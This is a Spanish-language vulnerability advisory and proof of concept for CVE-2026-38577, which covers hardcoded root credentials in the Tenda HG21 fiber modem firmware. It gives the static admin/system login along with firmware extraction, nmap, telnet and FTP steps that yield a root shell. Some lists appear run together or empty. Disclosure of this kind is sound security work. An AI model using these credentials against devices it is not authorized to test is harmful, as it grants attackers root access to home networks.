
Prueba de concepto que demuestra credenciales raíz codificadas (admin/system) en el firmware del módem XPON Tenda HG21, lo que permite acceso raíz no autorizado mediante telnet y FTP.
| Campo | Valor |
|---|---|
| ID CVE | CVE-2026-38577 |
| Fabricante | Tenda |
| Producto | Tenda HG21 (Módem de fibra XPON) |
| Versión afectada | V4.0.0-260302 |
| Clave de producto | HG21-V1.0-TDE01 |
| Versión de hardware | V1.0 |
| Fecha de compilación del firmware | 2026-03-02 |
| Archivo de firmware | US_HG21re_300002982_en_xpon_2.zip |
| Clase de vulnerabilidad | CWE-798: Uso de credenciales codificadas |
| Descubridor | Anmol Singh Rajput — Investigador de seguridad independiente |
| Estado de divulgación | Fabricante aún no notificado en el momento de la reserva del CVE — se aplica un plazo de divulgación responsable de 90 días desde la fecha de asignación del CVE |
El análisis del firmware del módem de fibra XPON Tenda HG21 reveló una cuenta administrativa codificada integrada en la imagen de firmware distribuida. A la cuenta se le conceden privilegios completos de root (UID 0) y sus credenciales son estáticas en todos los dispositivos, lo que significa que cualquier atacante que pueda acceder a un servicio de administración expuesto en una unidad vulnerable puede autenticarse como root sin necesidad de conocer la contraseña de la interfaz web establecida por el cliente.
/etc/passwd en el firmware extraído incluye una entrada admin con un
hash de contraseña SHA256crypt que se resuelve al valor estático system.0 — es decir, es root, no una cuenta de
servicio restringida./etc/shadow, por lo que el hash débil/estático en passwd es la
única barrera que protege la cuenta./etc/inetd.conf inicia telnetd y ftpd, ambos ejecutados como root,
por lo que la cuenta codificada es accesible a través de la red, no solo
desde una consola serie/UART.Un atacante con acceso de red al servicio telnet (TCP/23) o FTP (TCP/21)
de un dispositivo vulnerable puede iniciar sesión como admin usando la
contraseña estática y obtener un shell root / acceso a archivos a nivel de
root. Esto permite, como mínimo:
Vectores CVSS del envío original (la puntuación del fabricante puede diferir una vez publicada):
Esta es una PoC basada en credenciales — demuestra que la cuenta codificada autentica y otorga root, no es un exploit de corrupción de memoria. Ejecútela únicamente contra un dispositivo que le pertenezca o para el que tenga autorización explícita de prueba.
# Extraer el firmware (binwalk o la herramienta del fabricante que prefiera)
binwalk -e US_HG21re_300002982_en_xpon_2.bin
# Localizar e inspeccionar el archivo passwd
find . -name passwd
cat squashfs-root/etc/passwd
# -> admin:<sha256crypt-hash-of-"system">:0:0:root:/root:/bin/sh
nmap -p 21,23 <target-ip>
telnet <target-ip>
# login: admin
# password: system
ftp <target-ip>
# Name: admin
# Password: system
Un inicio de sesión exitoso en cualquiera de los dos servicios devuelve un
shell/sesión FTP con privilegios de root (id reportará uid=0(root)).
admin/system, o como mínimo forzar una contraseña aleatoria única por
dispositivo establecida en el primer arranque (no derivable únicamente
del número de serie).telnetd/ftpd por defecto; exigir una activación
explícita y un canal autenticado y cifrado (SSH/SFTP) para la
administración remota.| Fecha | Evento |
|---|---|
| 2026-03-02 | Versión vulnerable del firmware publicada |
| — | Descubierta durante un análisis independiente del firmware |
| 2026-04-09 | CVE-2026-38577 reservado mediante MITRE |
| — | Notificación al fabricante pendiente (ventana de divulgación de 90 días desde la asignación del CVE) |
Descubierto y reportado por: